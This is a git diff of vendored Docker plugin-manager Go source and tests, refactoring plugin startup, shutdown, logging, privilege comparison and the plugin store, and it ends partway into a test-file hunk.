This is recommended to run in a goroutine +// GC cleans up unreferenced blobs. This is recommended to run in a goroutine func (pm *Manager) GC() { pm.muGC.Lock() defer pm.muGC.Unlock() @@ -294,33 +319,45 @@ func (l logHook) Fire(entry *logrus.Entry) error { return nil } -func attachToLog(id string) func(libcontainerd.IOPipe) error { - return func(iop libcontainerd.IOPipe) error { - iop.Stdin.Close() - - logger := logrus.New() - logger.Hooks.Add(logHook{id}) - // TODO: cache writer per id - w := logger.Writer() - go func() { - io.Copy(w, iop.Stdout) - }() - go func() { - // TODO: update logrus and use logger.WriterLevel - io.Copy(w, iop.Stderr) - }() - return nil - } +func makeLoggerStreams(id string) (stdout, stderr io.WriteCloser) { + logger := logrus.New() + logger.Hooks.Add(logHook{id}) + return logger.WriterLevel(logrus.InfoLevel), logger.WriterLevel(logrus.ErrorLevel) } func validatePrivileges(requiredPrivileges, privileges types.PluginPrivileges) error { - // todo: make a better function that doesn't check order - if !reflect.DeepEqual(privileges, requiredPrivileges) { + if !isEqual(requiredPrivileges, privileges, isEqualPrivilege) { return errors.New("incorrect privileges") } + return nil } +func isEqual(arrOne, arrOther types.PluginPrivileges, compare func(x, y types.PluginPrivilege) bool) bool { + if len(arrOne) != len(arrOther) { + return false + } + + sort.Sort(arrOne) + sort.Sort(arrOther) + + for i := 1; i < arrOne.Len(); i++ { + if !compare(arrOne[i], arrOther[i]) { + return false + } + } + + return true +} + +func isEqualPrivilege(a, b types.PluginPrivilege) bool { + if a.Name != b.Name { + return false + } + + return reflect.DeepEqual(a.Value, b.Value) +} + func configToRootFS(c []byte) (*image.RootFS, error) { var pluginConfig types.PluginConfig if err := json.Unmarshal(c, &pluginConfig); err != nil { diff --git a/vendor/github.com/docker/docker/plugin/manager_linux.go b/vendor/github.com/docker/docker/plugin/manager_linux.go index 
ad66616628..3c6f9c553a 100644 --- a/vendor/github.com/docker/docker/plugin/manager_linux.go +++ b/vendor/github.com/docker/docker/plugin/manager_linux.go @@ -1,32 +1,31 @@ -// +build linux - -package plugin +package plugin // import "github.com/docker/docker/plugin" import ( "encoding/json" - "fmt" + "net" "os" "path/filepath" - "syscall" "time" - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" "github.com/docker/docker/api/types" "github.com/docker/docker/daemon/initlayer" - "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/pkg/containerfs" + "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/mount" "github.com/docker/docker/pkg/plugins" "github.com/docker/docker/pkg/stringid" "github.com/docker/docker/plugin/v2" - specs "github.com/opencontainers/runtime-spec/specs-go" + "github.com/opencontainers/go-digest" "github.com/pkg/errors" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) func (pm *Manager) enable(p *v2.Plugin, c *controller, force bool) error { p.Rootfs = filepath.Join(pm.config.Root, p.PluginObj.ID, "rootfs") if p.IsEnabled() && !force { - return fmt.Errorf("plugin %s is already enabled", p.Name()) + return errors.Wrap(enabledError(p.Name()), "plugin already enabled") } spec, err := p.InitSpec(pm.config.ExecRoot) if err != nil { @@ -41,7 +40,7 @@ func (pm *Manager) enable(p *v2.Plugin, c *controller, force bool) error { pm.mu.Unlock() var propRoot string - if p.PropagatedMount != "" { + if p.PluginObj.Config.PropagatedMount != "" { propRoot = filepath.Join(filepath.Dir(p.Rootfs), "propagated-mount") if err := os.MkdirAll(propRoot, 0755); err != nil { @@ -51,55 +50,82 @@ func (pm *Manager) enable(p *v2.Plugin, c *controller, force bool) error { if err := mount.MakeRShared(propRoot); err != nil { return errors.Wrap(err, "error setting up propagated mount dir") } - - if err := mount.Mount(propRoot, p.PropagatedMount, "none", "rbind"); err != nil { - 
return errors.Wrap(err, "error creating mount for propagated mount") - } } - if err := initlayer.Setup(filepath.Join(pm.config.Root, p.PluginObj.ID, rootFSFileName), 0, 0); err != nil { + rootFS := containerfs.NewLocalContainerFS(filepath.Join(pm.config.Root, p.PluginObj.ID, rootFSFileName)) + if err := initlayer.Setup(rootFS, idtools.IDPair{UID: 0, GID: 0}); err != nil { return errors.WithStack(err) } - if err := pm.containerdClient.Create(p.GetID(), "", "", specs.Spec(*spec), attachToLog(p.GetID())); err != nil { - if p.PropagatedMount != "" { - if err := mount.Unmount(p.PropagatedMount); err != nil { - logrus.Warnf("Could not unmount %s: %v", p.PropagatedMount, err) - } + stdout, stderr := makeLoggerStreams(p.GetID()) + if err := pm.executor.Create(p.GetID(), *spec, stdout, stderr); err != nil { + if p.PluginObj.Config.PropagatedMount != "" { if err := mount.Unmount(propRoot); err != nil { logrus.Warnf("Could not unmount %s: %v", propRoot, err) } } return errors.WithStack(err) } - return pm.pluginPostStart(p, c) } func (pm *Manager) pluginPostStart(p *v2.Plugin, c *controller) error { - client, err := plugins.NewClientWithTimeout("unix://"+filepath.Join(pm.config.ExecRoot, p.GetID(), p.GetSocket()), nil, c.timeoutInSecs) - if err != nil { - c.restart = false - shutdownPlugin(p, c, pm.containerdClient) - return errors.WithStack(err) + sockAddr := filepath.Join(pm.config.ExecRoot, p.GetID(), p.GetSocket()) + p.SetTimeout(time.Duration(c.timeoutInSecs) * time.Second) + addr := &net.UnixAddr{Net: "unix", Name: sockAddr} + p.SetAddr(addr) + + if p.Protocol() == plugins.ProtocolSchemeHTTPV1 { + client, err := plugins.NewClientWithTimeout(addr.Network()+"://"+addr.String(), nil, p.Timeout()) + if err != nil { + c.restart = false + shutdownPlugin(p, c.exitChan, pm.executor) + return errors.WithStack(err) + } + + p.SetPClient(client) } - p.SetPClient(client) + // Initial sleep before net Dial to allow plugin to listen on socket. 
+ time.Sleep(500 * time.Millisecond) + maxRetries := 3 + var retries int + for { + // net dial into the unix socket to see if someone's listening. + conn, err := net.Dial("unix", sockAddr) + if err == nil { + conn.Close() + break + } + + time.Sleep(3 * time.Second) + retries++ + + if retries > maxRetries { + logrus.Debugf("error net dialing plugin: %v", err) + c.restart = false + // While restoring plugins, we need to explicitly set the state to disabled + pm.config.Store.SetState(p, false) + shutdownPlugin(p, c.exitChan, pm.executor) + return err + } + + } pm.config.Store.SetState(p, true) pm.config.Store.CallHandler(p) return pm.save(p) } -func (pm *Manager) restore(p *v2.Plugin) error { - if err := pm.containerdClient.Restore(p.GetID(), attachToLog(p.GetID())); err != nil { +func (pm *Manager) restore(p *v2.Plugin, c *controller) error { + stdout, stderr := makeLoggerStreams(p.GetID()) + alive, err := pm.executor.Restore(p.GetID(), stdout, stderr) + if err != nil { return err } if pm.config.LiveRestoreEnabled { - c := &controller{} - if pids, _ := pm.containerdClient.GetPidsForContainer(p.GetID()); len(pids) == 0 { - // plugin is not running, so follow normal startup procedure + if !alive { return pm.enable(p, c, true) } @@ -111,35 +137,47 @@ func (pm *Manager) restore(p *v2.Plugin) error { return pm.pluginPostStart(p, c) } + if alive { + // TODO(@cpuguy83): Should we always just re-attach to the running plugin instead of doing this? 
+ c.restart = false + shutdownPlugin(p, c.exitChan, pm.executor) + } + return nil } -func shutdownPlugin(p *v2.Plugin, c *controller, containerdClient libcontainerd.Client) { +func shutdownPlugin(p *v2.Plugin, ec chan bool, executor Executor) { pluginID := p.GetID() - err := containerdClient.Signal(pluginID, int(syscall.SIGTERM)) + err := executor.Signal(pluginID, int(unix.SIGTERM)) if err != nil { logrus.Errorf("Sending SIGTERM to plugin failed with error: %v", err) } else { select { - case <-c.exitChan: + case <-ec: logrus.Debug("Clean shutdown of plugin") case <-time.After(time.Second * 10): logrus.Debug("Force shutdown plugin") - if err := containerdClient.Signal(pluginID, int(syscall.SIGKILL)); err != nil { + if err := executor.Signal(pluginID, int(unix.SIGKILL)); err != nil { logrus.Errorf("Sending SIGKILL to plugin failed with error: %v", err) } + select { + case <-ec: + logrus.Debug("SIGKILL plugin shutdown") + case <-time.After(time.Second * 10): + logrus.Debug("Force shutdown plugin FAILED") + } } } } func (pm *Manager) disable(p *v2.Plugin, c *controller) error { if !p.IsEnabled() { - return fmt.Errorf("plugin %s is already disabled", p.Name()) + return errors.Wrap(errDisabled(p.Name()), "plugin is already disabled") } c.restart = false - shutdownPlugin(p, c, pm.containerdClient) + shutdownPlugin(p, c.exitChan, pm.executor) pm.config.Store.SetState(p, false) return pm.save(p) } @@ -156,11 +194,14 @@ func (pm *Manager) Shutdown() { logrus.Debug("Plugin active when liveRestore is set, skipping shutdown") continue } - if pm.containerdClient != nil && p.IsEnabled() { + if pm.executor != nil && p.IsEnabled() { c.restart = false - shutdownPlugin(p, c, pm.containerdClient) + shutdownPlugin(p, c.exitChan, pm.executor) } } + if err := mount.RecursiveUnmount(pm.config.Root); err != nil { + logrus.WithError(err).Warn("error cleaning up plugin mounts") + } } func (pm *Manager) upgradePlugin(p *v2.Plugin, configDigest digest.Digest, blobsums []digest.Digest, 
tmpRootFSDir string, privileges *types.PluginPrivileges) (err error) { @@ -171,9 +212,17 @@ func (pm *Manager) upgradePlugin(p *v2.Plugin, configDigest digest.Digest, blobs pdir := filepath.Join(pm.config.Root, p.PluginObj.ID) orig := filepath.Join(pdir, "rootfs") + + // Make sure nothing is mounted + // This could happen if the plugin was disabled with `-f` with active mounts. + // If there is anything in `orig` is still mounted, this should error out. + if err := mount.RecursiveUnmount(orig); err != nil { + return errdefs.System(err) + } + backup := orig + "-old" if err := os.Rename(orig, backup); err != nil { - return err + return errors.Wrap(errdefs.System(err), "error backing up plugin data before upgrade") } defer func() { @@ -182,9 +231,8 @@ func (pm *Manager) upgradePlugin(p *v2.Plugin, configDigest digest.Digest, blobs logrus.WithError(rmErr).WithField("dir", backup).Error("error cleaning up after failed upgrade") return } - - if err := os.Rename(backup, orig); err != nil { - err = errors.Wrap(err, "error restoring old plugin root on upgrade failure") + if mvErr := os.Rename(backup, orig); mvErr != nil { + err = errors.Wrap(mvErr, "error restoring old plugin root on upgrade failure") } if rmErr := os.RemoveAll(tmpRootFSDir); rmErr != nil && !os.IsNotExist(rmErr) { logrus.WithError(rmErr).WithField("plugin", p.Name()).Errorf("error cleaning up plugin upgrade dir: %s", tmpRootFSDir) @@ -200,7 +248,7 @@ func (pm *Manager) upgradePlugin(p *v2.Plugin, configDigest digest.Digest, blobs }() if err := os.Rename(tmpRootFSDir, orig); err != nil { - return errors.Wrap(err, "error upgrading") + return errors.Wrap(errdefs.System(err), "error upgrading") } p.PluginObj.Config = config @@ -224,7 +272,7 @@ func (pm *Manager) setupNewPlugin(configDigest digest.Digest, blobsums []digest. 
return types.PluginConfig{}, errors.New("invalid config json") } - requiredPrivileges, err := computePrivileges(config) + requiredPrivileges := computePrivileges(config) if err != nil { return types.PluginConfig{}, err } @@ -238,9 +286,9 @@ func (pm *Manager) setupNewPlugin(configDigest digest.Digest, blobsums []digest. } // createPlugin creates a new plugin. take lock before calling. -func (pm *Manager) createPlugin(name string, configDigest digest.Digest, blobsums []digest.Digest, rootFSDir string, privileges *types.PluginPrivileges) (p *v2.Plugin, err error) { +func (pm *Manager) createPlugin(name string, configDigest digest.Digest, blobsums []digest.Digest, rootFSDir string, privileges *types.PluginPrivileges, opts ...CreateOpt) (p *v2.Plugin, err error) { if err := pm.config.Store.validateName(name); err != nil { // todo: this check is wrong. remove store - return nil, err + return nil, errdefs.InvalidParameter(err) } config, err := pm.setupNewPlugin(configDigest, blobsums, privileges) @@ -258,6 +306,9 @@ func (pm *Manager) createPlugin(name string, configDigest digest.Digest, blobsum Blobsums: blobsums, } p.InitEmptySettings() + for _, o := range opts { + o(p) + } pdir := filepath.Join(pm.config.Root, p.PluginObj.ID) if err := os.MkdirAll(pdir, 0700); err != nil { diff --git a/vendor/github.com/docker/docker/plugin/manager_linux_test.go b/vendor/github.com/docker/docker/plugin/manager_linux_test.go new file mode 100644 index 0000000000..fd8fa8523c --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/manager_linux_test.go @@ -0,0 +1,279 @@ +package plugin // import "github.com/docker/docker/plugin" + +import ( + "io" + "io/ioutil" + "net" + "os" + "path/filepath" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/system" + "github.com/docker/docker/plugin/v2" + "github.com/opencontainers/runtime-spec/specs-go" + "github.com/pkg/errors" + 
"gotest.tools/skip" +) + +func TestManagerWithPluginMounts(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") + root, err := ioutil.TempDir("", "test-store-with-plugin-mounts") + if err != nil { + t.Fatal(err) + } + defer system.EnsureRemoveAll(root) + + s := NewStore() + managerRoot := filepath.Join(root, "manager") + p1 := newTestPlugin(t, "test1", "testcap", managerRoot) + + p2 := newTestPlugin(t, "test2", "testcap", managerRoot) + p2.PluginObj.Enabled = true + + m, err := NewManager( + ManagerConfig{ + Store: s, + Root: managerRoot, + ExecRoot: filepath.Join(root, "exec"), + CreateExecutor: func(*Manager) (Executor, error) { return nil, nil }, + LogPluginEvent: func(_, _, _ string) {}, + }) + if err != nil { + t.Fatal(err) + } + + if err := s.Add(p1); err != nil { + t.Fatal(err) + } + if err := s.Add(p2); err != nil { + t.Fatal(err) + } + + // Create a mount to simulate a plugin that has created it's own mounts + p2Mount := filepath.Join(p2.Rootfs, "testmount") + if err := os.MkdirAll(p2Mount, 0755); err != nil { + t.Fatal(err) + } + if err := mount.Mount("tmpfs", p2Mount, "tmpfs", ""); err != nil { + t.Fatal(err) + } + + if err := m.Remove(p1.GetID(), &types.PluginRmConfig{ForceRemove: true}); err != nil { + t.Fatal(err) + } + if mounted, err := mount.Mounted(p2Mount); !mounted || err != nil { + t.Fatalf("expected %s to be mounted, err: %v", p2Mount, err) + } +} + +func newTestPlugin(t *testing.T, name, cap, root string) *v2.Plugin { + id := stringid.GenerateNonCryptoID() + rootfs := filepath.Join(root, id) + if err := os.MkdirAll(rootfs, 0755); err != nil { + t.Fatal(err) + } + + p := v2.Plugin{PluginObj: types.Plugin{ID: id, Name: name}} + p.Rootfs = rootfs + iType := types.PluginInterfaceType{Capability: cap, Prefix: "docker", Version: "1.0"} + i := types.PluginConfigInterface{Socket: "plugin.sock", Types: []types.PluginInterfaceType{iType}} + p.PluginObj.Config.Interface = i + p.PluginObj.ID = id + + return &p +} + +type 
simpleExecutor struct { +} + +func (e *simpleExecutor) Create(id string, spec specs.Spec, stdout, stderr io.WriteCloser) error { + return errors.New("Create failed") +} + +func (e *simpleExecutor) Restore(id string, stdout, stderr io.WriteCloser) (bool, error) { + return false, nil +} + +func (e *simpleExecutor) IsRunning(id string) (bool, error) { + return false, nil +} + +func (e *simpleExecutor) Signal(id string, signal int) error { + return nil +} + +func TestCreateFailed(t *testing.T) { + root, err := ioutil.TempDir("", "test-create-failed") + if err != nil { + t.Fatal(err) + } + defer system.EnsureRemoveAll(root) + + s := NewStore() + managerRoot := filepath.Join(root, "manager") + p := newTestPlugin(t, "create", "testcreate", managerRoot) + + m, err := NewManager( + ManagerConfig{ + Store: s, + Root: managerRoot, + ExecRoot: filepath.Join(root, "exec"), + CreateExecutor: func(*Manager) (Executor, error) { return &simpleExecutor{}, nil }, + LogPluginEvent: func(_, _, _ string) {}, + }) + if err != nil { + t.Fatal(err) + } + + if err := s.Add(p); err != nil { + t.Fatal(err) + } + + if err := m.enable(p, &controller{}, false); err == nil { + t.Fatalf("expected Create failed error, got %v", err) + } + + if err := m.Remove(p.GetID(), &types.PluginRmConfig{ForceRemove: true}); err != nil { + t.Fatal(err) + } +} + +type executorWithRunning struct { + m *Manager + root string + exitChans map[string]chan struct{} +} + +func (e *executorWithRunning) Create(id string, spec specs.Spec, stdout, stderr io.WriteCloser) error { + sockAddr := filepath.Join(e.root, id, "plugin.sock") + ch := make(chan struct{}) + if e.exitChans == nil { + e.exitChans = make(map[string]chan struct{}) + } + e.exitChans[id] = ch + listenTestPlugin(sockAddr, ch) + return nil +} + +func (e *executorWithRunning) IsRunning(id string) (bool, error) { + return true, nil +} +func (e *executorWithRunning) Restore(id string, stdout, stderr io.WriteCloser) (bool, error) { + return true, nil +} + +func (e 
*executorWithRunning) Signal(id string, signal int) error { + ch := e.exitChans[id] + ch <- struct{}{} + <-ch + e.m.HandleExitEvent(id) + return nil +} + +func TestPluginAlreadyRunningOnStartup(t *testing.T) { + t.Parallel() + + root, err := ioutil.TempDir("", t.Name()) + if err != nil { + t.Fatal(err) + } + defer system.EnsureRemoveAll(root) + + for _, test := range []struct { + desc string + config ManagerConfig + }{ + { + desc: "live-restore-disabled", + config: ManagerConfig{ + LogPluginEvent: func(_, _, _ string) {}, + }, + }, + { + desc: "live-restore-enabled", + config: ManagerConfig{ + LogPluginEvent: func(_, _, _ string) {}, + LiveRestoreEnabled: true, + }, + }, + } { + t.Run(test.desc, func(t *testing.T) { + config := test.config + desc := test.desc + t.Parallel() + + p := newTestPlugin(t, desc, desc, config.Root) + p.PluginObj.Enabled = true + + // Need a short-ish path here so we don't run into unix socket path length issues. + config.ExecRoot, err = ioutil.TempDir("", "plugintest") + + executor := &executorWithRunning{root: config.ExecRoot} + config.CreateExecutor = func(m *Manager) (Executor, error) { executor.m = m; return executor, nil } + + if err := executor.Create(p.GetID(), specs.Spec{}, nil, nil); err != nil { + t.Fatal(err) + } + + root := filepath.Join(root, desc) + config.Root = filepath.Join(root, "manager") + if err := os.MkdirAll(filepath.Join(config.Root, p.GetID()), 0755); err != nil { + t.Fatal(err) + } + + if !p.IsEnabled() { + t.Fatal("plugin should be enabled") + } + if err := (&Manager{config: config}).save(p); err != nil { + t.Fatal(err) + } + + s := NewStore() + config.Store = s + if err != nil { + t.Fatal(err) + } + defer system.EnsureRemoveAll(config.ExecRoot) + + m, err := NewManager(config) + if err != nil { + t.Fatal(err) + } + defer m.Shutdown() + + p = s.GetAll()[p.GetID()] // refresh `p` with what the manager knows + if p.Client() == nil { + t.Fatal("plugin client should not be nil") + } + }) + } +} + +func 
listenTestPlugin(sockAddr string, exit chan struct{}) (net.Listener, error) { + if err := os.MkdirAll(filepath.Dir(sockAddr), 0755); err != nil { + return nil, err + } + l, err := net.Listen("unix", sockAddr) + if err != nil { + return nil, err + } + go func() { + for { + conn, err := l.Accept() + if err != nil { + return + } + conn.Close() + } + }() + go func() { + <-exit + l.Close() + os.Remove(sockAddr) + exit <- struct{}{} + }() + return l, nil +} diff --git a/vendor/github.com/docker/docker/plugin/manager_solaris.go b/vendor/github.com/docker/docker/plugin/manager_solaris.go deleted file mode 100644 index 72ccae72d3..0000000000 --- a/vendor/github.com/docker/docker/plugin/manager_solaris.go +++ /dev/null @@ -1,28 +0,0 @@ -package plugin - -import ( - "fmt" - - "github.com/docker/docker/plugin/v2" - specs "github.com/opencontainers/runtime-spec/specs-go" -) - -func (pm *Manager) enable(p *v2.Plugin, c *controller, force bool) error { - return fmt.Errorf("Not implemented") -} - -func (pm *Manager) initSpec(p *v2.Plugin) (*specs.Spec, error) { - return nil, fmt.Errorf("Not implemented") -} - -func (pm *Manager) disable(p *v2.Plugin, c *controller) error { - return fmt.Errorf("Not implemented") -} - -func (pm *Manager) restore(p *v2.Plugin) error { - return fmt.Errorf("Not implemented") -} - -// Shutdown plugins -func (pm *Manager) Shutdown() { -} diff --git a/vendor/github.com/docker/docker/plugin/manager_test.go b/vendor/github.com/docker/docker/plugin/manager_test.go new file mode 100644 index 0000000000..62ccf2149d --- /dev/null +++ b/vendor/github.com/docker/docker/plugin/manager_test.go @@ -0,0 +1,55 @@ +package plugin // import "github.com/docker/docker/plugin" + +import ( + "testing" + + "github.com/docker/docker/api/types" +) + +func TestValidatePrivileges(t *testing.T) { + testData := map[string]struct { + requiredPrivileges types.PluginPrivileges + privileges types.PluginPrivileges + result bool + }{ + "diff-len": { + requiredPrivileges: 
[]types.PluginPrivilege{ + {Name: "Privilege1", Description: "Description", Value: []string{"abc", "def", "ghi"}}, + }, + privileges: []types.PluginPrivilege{ + {Name: "Privilege1", Description: "Description", Value: []string{"abc", "def", "ghi"}}, + {Name: "Privilege2", Description: "Description", Value: []string{"123", "456", "789"}}, + }, + result: false, + }, + "diff-value": { + requiredPrivileges: []types.PluginPrivilege{ + {Name: "Privilege1", Description: "Description", Value: []string{"abc", "def", "GHI"}}, + {Name: "Privilege2", Description: "Description", Value: []string{"123", "456", "***"}}, + }, + privileges: []types.PluginPrivilege{ + {Name: "Privilege1", Description: "Description", Value: []string{"abc", "def", "ghi"}}, + {Name: "Privilege2", Description: "Description", Value: []string{"123", "456", "789"}}, + }, + result: false, + }, + "diff-order-but-same-value": { + requiredPrivileges: []types.PluginPrivilege{ + {Name: "Privilege1", Description: "Description", Value: []string{"abc", "def", "GHI"}}, + {Name: "Privilege2", Description: "Description", Value: []string{"123", "456", "789"}}, + }, + privileges: []types.PluginPrivilege{ + {Name: "Privilege2", Description: "Description", Value: []string{"123", "456", "789"}}, + {Name: "Privilege1", Description: "Description", Value: []string{"GHI", "abc", "def"}}, + }, + result: true, + }, + } + + for key, data := range testData { + err := validatePrivileges(data.requiredPrivileges, data.privileges) + if (err == nil) != data.result { + t.Fatalf("Test item %s expected result to be %t, got %t", key, data.result, (err == nil)) + } + } +} diff --git a/vendor/github.com/docker/docker/plugin/manager_windows.go b/vendor/github.com/docker/docker/plugin/manager_windows.go index 4469a671f7..90cc52c992 100644 --- a/vendor/github.com/docker/docker/plugin/manager_windows.go +++ b/vendor/github.com/docker/docker/plugin/manager_windows.go @@ -1,6 +1,4 @@ -// +build windows - -package plugin +package plugin // import 
"github.com/docker/docker/plugin" import ( "fmt" @@ -21,7 +19,7 @@ func (pm *Manager) disable(p *v2.Plugin, c *controller) error { return fmt.Errorf("Not implemented") } -func (pm *Manager) restore(p *v2.Plugin) error { +func (pm *Manager) restore(p *v2.Plugin, c *controller) error { return fmt.Errorf("Not implemented") } diff --git a/vendor/github.com/docker/docker/plugin/store.go b/vendor/github.com/docker/docker/plugin/store.go index b7a96a950a..8e96c11da4 100644 --- a/vendor/github.com/docker/docker/plugin/store.go +++ b/vendor/github.com/docker/docker/plugin/store.go @@ -1,42 +1,32 @@ -package plugin +package plugin // import "github.com/docker/docker/plugin" import ( "fmt" "strings" - "github.com/Sirupsen/logrus" + "github.com/docker/distribution/reference" + "github.com/docker/docker/errdefs" "github.com/docker/docker/pkg/plugingetter" "github.com/docker/docker/pkg/plugins" "github.com/docker/docker/plugin/v2" - "github.com/docker/docker/reference" + "github.com/opencontainers/runtime-spec/specs-go" "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) /* allowV1PluginsFallback determines daemon's support for V1 plugins. * When the time comes to remove support for V1 plugins, flipping * this bool is all that will be needed. */ -const allowV1PluginsFallback bool = true +const allowV1PluginsFallback = true /* defaultAPIVersion is the version of the plugin API for volume, network, IPAM and authz. This is a very stable API. When we update this API, then - pluginType should include a version. eg "networkdriver/2.0". + pluginType should include a version. e.g. "networkdriver/2.0". */ -const defaultAPIVersion string = "1.0" +const defaultAPIVersion = "1.0" -// ErrNotFound indicates that a plugin was not found locally. -type ErrNotFound string - -func (name ErrNotFound) Error() string { return fmt.Sprintf("plugin %q not found", string(name)) } - -// ErrAmbiguous indicates that a plugin was not found locally. 
-type ErrAmbiguous string - -func (name ErrAmbiguous) Error() string { - return fmt.Sprintf("multiple plugins found for %q", string(name)) -} - -// GetV2Plugin retreives a plugin by name, id or partial ID. +// GetV2Plugin retrieves a plugin by name, id or partial ID. func (ps *Store) GetV2Plugin(refOrID string) (*v2.Plugin, error) { ps.RLock() defer ps.RUnlock() @@ -48,7 +38,7 @@ func (ps *Store) GetV2Plugin(refOrID string) (*v2.Plugin, error) { p, idOk := ps.plugins[id] if !idOk { - return nil, errors.WithStack(ErrNotFound(id)) + return nil, errors.WithStack(errNotFound(id)) } return p, nil @@ -58,13 +48,13 @@ func (ps *Store) GetV2Plugin(refOrID string) (*v2.Plugin, error) { func (ps *Store) validateName(name string) error { for _, p := range ps.plugins { if p.Name() == name { - return errors.Errorf("plugin %q already exists", name) + return alreadyExistsError(name) } } return nil } -// GetAll retreives all plugins. +// GetAll retrieves all plugins. func (ps *Store) GetAll() map[string]*v2.Plugin { ps.RLock() defer ps.RUnlock() @@ -75,6 +65,10 @@ func (ps *Store) GetAll() map[string]*v2.Plugin { func (ps *Store) SetAll(plugins map[string]*v2.Plugin) { ps.Lock() defer ps.Unlock() + + for _, p := range plugins { + ps.setSpecOpts(p) + } ps.plugins = plugins } @@ -101,6 +95,22 @@ func (ps *Store) SetState(p *v2.Plugin, state bool) { p.PluginObj.Enabled = state } +func (ps *Store) setSpecOpts(p *v2.Plugin) { + var specOpts []SpecOpt + for _, typ := range p.GetTypes() { + opts, ok := ps.specOpts[typ.String()] + if ok { + specOpts = append(specOpts, opts...) + } + } + + p.SetSpecOptModifier(func(s *specs.Spec) { + for _, o := range specOpts { + o(s) + } + }) +} + // Add adds a plugin to memory and plugindb. // An error will be returned if there is a collision. 
func (ps *Store) Add(p *v2.Plugin) error { @@ -110,6 +120,9 @@ func (ps *Store) Add(p *v2.Plugin) error { if v, exist := ps.plugins[p.GetID()]; exist { return fmt.Errorf("plugin %q has the same ID %s as %q", p.Name(), p.GetID(), v.Name()) } + + ps.setSpecOpts(p) + ps.plugins[p.GetID()] = p return nil } @@ -123,38 +136,40 @@ func (ps *Store) Remove(p *v2.Plugin) { // Get returns an enabled plugin matching the given name and capability. func (ps *Store) Get(name, capability string, mode int) (plugingetter.CompatPlugin, error) { - var ( - p *v2.Plugin - err error - ) - // Lookup using new model. if ps != nil { - p, err = ps.GetV2Plugin(name) + p, err := ps.GetV2Plugin(name) if err == nil { - p.AddRefCount(mode) if p.IsEnabled() { - return p.FilterByCap(capability) + fp, err := p.FilterByCap(capability) + if err != nil { + return nil, err + } + p.AddRefCount(mode) + return fp, nil } + // Plugin was found but it is disabled, so we should not fall back to legacy plugins // but we should error out right away - return nil, ErrNotFound(name) + return nil, errDisabled(name) } - if _, ok := errors.Cause(err).(ErrNotFound); !ok { + if _, ok := errors.Cause(err).(errNotFound); !ok { return nil, err } } - // Lookup using legacy model. - if allowV1PluginsFallback { - p, err := plugins.Get(name, capability) - if err != nil { - return nil, fmt.Errorf("legacy plugin: %v", err) - } - return p, nil + if !allowV1PluginsFallback { + return nil, errNotFound(name) } - return nil, err + p, err := plugins.Get(name, capability) + if err == nil { + return p, nil + } + if errors.Cause(err) == plugins.ErrNotFound { + return nil, errNotFound(name) + } + return nil, errors.Wrap(errdefs.System(err), "legacy plugin") } // GetAllManagedPluginsByCap returns a list of managed plugins matching the given capability. 
@@ -182,7 +197,7 @@ func (ps *Store) GetAllByCap(capability string) ([]plugingetter.CompatPlugin, er if allowV1PluginsFallback { pl, err := plugins.GetAll(capability) if err != nil { - return nil, fmt.Errorf("legacy plugin: %v", err) + return nil, errors.Wrap(errdefs.System(err), "legacy plugin") } for _, p := range pl { result = append(result, p) @@ -191,20 +206,24 @@ func (ps *Store) GetAllByCap(capability string) ([]plugingetter.CompatPlugin, er return result, nil } +func pluginType(cap string) string { + return fmt.Sprintf("docker.%s/%s", strings.ToLower(cap), defaultAPIVersion) +} + // Handle sets a callback for a given capability. It is only used by network // and ipam drivers during plugin registration. The callback registers the // driver with the subsystem (network, ipam). func (ps *Store) Handle(capability string, callback func(string, *plugins.Client)) { - pluginType := fmt.Sprintf("docker.%s/%s", strings.ToLower(capability), defaultAPIVersion) + typ := pluginType(capability) // Register callback with new plugin model. ps.Lock() - handlers, ok := ps.handlers[pluginType] + handlers, ok := ps.handlers[typ] if !ok { handlers = []func(string, *plugins.Client){} } handlers = append(handlers, callback) - ps.handlers[pluginType] = handlers + ps.handlers[typ] = handlers ps.Unlock() // Register callback with legacy plugin model. @@ -213,6 +232,15 @@ func (ps *Store) Handle(capability string, callback func(string, *plugins.Client } } +// RegisterRuntimeOpt stores a list of SpecOpts for the provided capability. +// These options are applied to the runtime spec before a plugin is started for the specified capability. +func (ps *Store) RegisterRuntimeOpt(cap string, opts ...SpecOpt) { + ps.Lock() + defer ps.Unlock() + typ := pluginType(cap) + ps.specOpts[typ] = append(ps.specOpts[typ], opts...) +} + // CallHandler calls the registered callback. It is invoked during plugin enable. 
func (ps *Store) CallHandler(p *v2.Plugin) { for _, typ := range p.GetTypes() { @@ -230,19 +258,19 @@ func (ps *Store) resolvePluginID(idOrName string) (string, error) { return idOrName, nil } - ref, err := reference.ParseNamed(idOrName) + ref, err := reference.ParseNormalizedNamed(idOrName) if err != nil { - return "", errors.WithStack(ErrNotFound(idOrName)) + return "", errors.WithStack(errNotFound(idOrName)) } if _, ok := ref.(reference.Canonical); ok { - logrus.Warnf("canonical references cannot be resolved: %v", ref.String()) - return "", errors.WithStack(ErrNotFound(idOrName)) + logrus.Warnf("canonical references cannot be resolved: %v", reference.FamiliarString(ref)) + return "", errors.WithStack(errNotFound(idOrName)) } - fullRef := reference.WithDefaultTag(ref) + ref = reference.TagNameOnly(ref) for _, p := range ps.plugins { - if p.PluginObj.Name == fullRef.String() { + if p.PluginObj.Name == reference.FamiliarString(ref) { return p.PluginObj.ID, nil } } @@ -251,13 +279,13 @@ func (ps *Store) resolvePluginID(idOrName string) (string, error) { for id, p := range ps.plugins { // this can be optimized if strings.HasPrefix(id, idOrName) { if found != nil { - return "", errors.WithStack(ErrAmbiguous(idOrName)) + return "", errors.WithStack(errAmbiguous(idOrName)) } found = p } } if found == nil { - return "", errors.WithStack(ErrNotFound(idOrName)) + return "", errors.WithStack(errNotFound(idOrName)) } return found.PluginObj.ID, nil } diff --git a/vendor/github.com/docker/docker/plugin/store_test.go b/vendor/github.com/docker/docker/plugin/store_test.go index 6b1f6a9418..14b484f76c 100644 --- a/vendor/github.com/docker/docker/plugin/store_test.go +++ b/vendor/github.com/docker/docker/plugin/store_test.go @@ -1,16 +1,17 @@ -package plugin +package plugin // import 